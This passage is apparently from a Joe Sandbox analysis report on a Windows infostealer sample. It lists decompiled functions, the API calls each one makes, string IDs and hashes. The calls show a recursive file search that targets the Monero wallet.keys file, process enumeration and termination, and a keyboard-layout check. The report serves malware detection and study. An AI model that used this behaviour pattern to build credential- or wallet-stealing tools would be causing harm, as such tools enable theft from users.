                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 8cbb77e3ad1f6c2e4b3be282afe21d27729c4063bc99b69703951e7bd3aeecf7
                          • Instruction ID: 94c96a3a7903e35058fac25882a45c7e3ad02e1e3e46fa14528f97e600edaa8d
                          • Opcode Fuzzy Hash: 8cbb77e3ad1f6c2e4b3be282afe21d27729c4063bc99b69703951e7bd3aeecf7
                          • Instruction Fuzzy Hash: D312DE71A101189BCB16FB60DCA6EEEB37DAF55300F4045E9B54A66093EF306B89CF61
                          Function 0002DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00040C32), ref: 0002DF5E
                          • StrCmpCA.SHLWAPI(?,000415C0), ref: 0002DFAE
                          • StrCmpCA.SHLWAPI(?,000415C4), ref: 0002DFC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002E4E0
                          • FindClose.KERNEL32(000000FF), ref: 0002E4F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: dd99e68f70d7666350094b9ca34fda43f42a9d55800b60ed8e427b01f6c0a981
                          • Instruction ID: 3cbdfb85ade254c72208b9cc4d6955c3246a7bc0970d0cee26379d8d5dca697a
                          • Opcode Fuzzy Hash: dd99e68f70d7666350094b9ca34fda43f42a9d55800b60ed8e427b01f6c0a981
                          • Instruction Fuzzy Hash: 24F1CF71A241189ACB16FB60DDA5EEEB33DAF15300F4055E9B14A62093EF306F89CF65
                          Function 0002DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000415A8,00040BAF), ref: 0002DBEB
                          • StrCmpCA.SHLWAPI(?,000415AC), ref: 0002DC33
                          • StrCmpCA.SHLWAPI(?,000415B0), ref: 0002DC49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002DECC
                          • FindClose.KERNEL32(000000FF), ref: 0002DEDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 04e2fc008f77d44e75f9b9da6834ac63f2c426ddbffe28bddd55882f66fa8b14
                          • Instruction ID: 65133f8cee04d3cb2192b4a33f5b74c2662818cc3e4d1d226680b1a25747f512
                          • Opcode Fuzzy Hash: 04e2fc008f77d44e75f9b9da6834ac63f2c426ddbffe28bddd55882f66fa8b14
                          • Instruction Fuzzy Hash: 52913273B001149BCB15FB70ED969ED737DAF95340F0086A9F94A56182EF349B48CBA2
                          Function 000398E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00039905
                          • Process32First.KERNEL32(00029FDE,00000128), ref: 00039919
                          • Process32Next.KERNEL32(00029FDE,00000128), ref: 0003992E
                          • StrCmpCA.SHLWAPI(?,00029FDE), ref: 00039943
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0003995C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0003997A
                          • CloseHandle.KERNEL32(00000000), ref: 00039987
                          • CloseHandle.KERNEL32(00029FDE), ref: 00039993
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 2696918072-0
                          • Opcode ID: aed9762694b037937d2e6f32f31a8d02959e733a57be92e5e68a1a987242e8e9
                          • Instruction ID: 04122aead7c92f5777d92ae29f3f5fc9545c9cac41e3b7e8f5737f2e675b78ba
                          • Opcode Fuzzy Hash: aed9762694b037937d2e6f32f31a8d02959e733a57be92e5e68a1a987242e8e9
                          • Instruction Fuzzy Hash: 2F112E75A04208ABDB64DFA4EC4CBEEB7BCBB49740F00459DF509A6240DB749B84CF90
                          Function 00477C17 Relevance: 11.7, Strings: 8, Instructions: 1667COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %_^$*87w$,;]q$-(~$en/]$r:?w$l|{$}[u
                          • API String ID: 0-424456402
                          • Opcode ID: 89b09f88e5333a552dda23fd5834601c76560a85ab8bb514a9ecb3f4e60d3b2c
                          • Instruction ID: 1a6d52af1695a86e631c3d6e4e7fdb40b14818063f85fc4399bdfc34e6b6bef1
                          • Opcode Fuzzy Hash: 89b09f88e5333a552dda23fd5834601c76560a85ab8bb514a9ecb3f4e60d3b2c
                          • Instruction Fuzzy Hash: 04B22AF360C2049FE304AE2DEC8567AFBD9EF94720F1A493DE6C4C3744EA7598058696
                          Function 0047B37C Relevance: 11.6, Strings: 8, Instructions: 1612COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6mN$G7]n$Ux{}$h+m!$h{qB$vm!$~-j$W}}
                          • API String ID: 0-130775809
                          • Opcode ID: 793e99bdee4671d16b661110e4ef9d30d3b91a44d1f8c0b0de64c0ee709dae6c
                          • Instruction ID: 431b312a76e7d3d468463d68ef3ca13c99b7892839dcf9498153467205600332
                          • Opcode Fuzzy Hash: 793e99bdee4671d16b661110e4ef9d30d3b91a44d1f8c0b0de64c0ee709dae6c
                          • Instruction Fuzzy Hash: 5EB207F360C214AFE304AE29EC8567ABBE9EF94720F16453DEAC4C7740EA3558058797
                          Function 00037D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • GetKeyboardLayoutList.USER32(00000000,00000000,000405B7), ref: 00037D71
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00037D89
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00037D9D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00037DF2
                          • LocalFree.KERNEL32(00000000), ref: 00037EB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 276e8fa5974870453f35f22c4ba572feae07ac3ae5b2c0d84ae447ae9d50bfa1
                          • Instruction ID: 5fac614eae0de81ed0000f51abd5048c818631a9fc90fb2e276a18d9e6961b76
                          • Opcode Fuzzy Hash: 276e8fa5974870453f35f22c4ba572feae07ac3ae5b2c0d84ae447ae9d50bfa1
                          • Instruction Fuzzy Hash: C44140B1944218ABCB25DB94DC99FEEB778FF48700F1041D9E10A66291DB746F84CF61
                          Function 0046F4E4 Relevance: 10.3, Strings: 7, Instructions: 1579COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2}$H{{|$KA_$\y8l$vtKM$wP~t$z?^
                          • API String ID: 0-1400557582
                          • Opcode ID: 9bc5b791cd74fb94a8c2a704142d12483a7bdc023a3dad85002a1a4c22099f2a
                          • Instruction ID: 32dadb5e21f3bdc083d63344d7f8be8e3c6b47230bd62940511f2311222d43aa
                          • Opcode Fuzzy Hash: 9bc5b791cd74fb94a8c2a704142d12483a7bdc023a3dad85002a1a4c22099f2a
                          • Instruction Fuzzy Hash: D2B207F360C2049FE304AE2DEC8577ABBE5EF94720F1A893DE6C4C7744E63598058696
                          Function 0002E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00040D79), ref: 0002E5A2
                          • StrCmpCA.SHLWAPI(?,000415F0), ref: 0002E5F2
                          • StrCmpCA.SHLWAPI(?,000415F4), ref: 0002E608
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002ECDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: a18b722249d9be3cb8a0f78511314e1b6862073cfff78967b2409d20e1e97828
                          • Instruction ID: 00ad15c96cb2727376a3e0763bc96529a6b269b21e68a5f19e0c498957c0b5a6
                          • Opcode Fuzzy Hash: a18b722249d9be3cb8a0f78511314e1b6862073cfff78967b2409d20e1e97828
                          • Instruction Fuzzy Hash: 8E12FD72B101189BCB16FB60DDA6EEDB37DAF55300F4045E9B54A66093EF306B48CB62
                          Function 00481E8F Relevance: 7.8, Strings: 5, Instructions: 1523COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
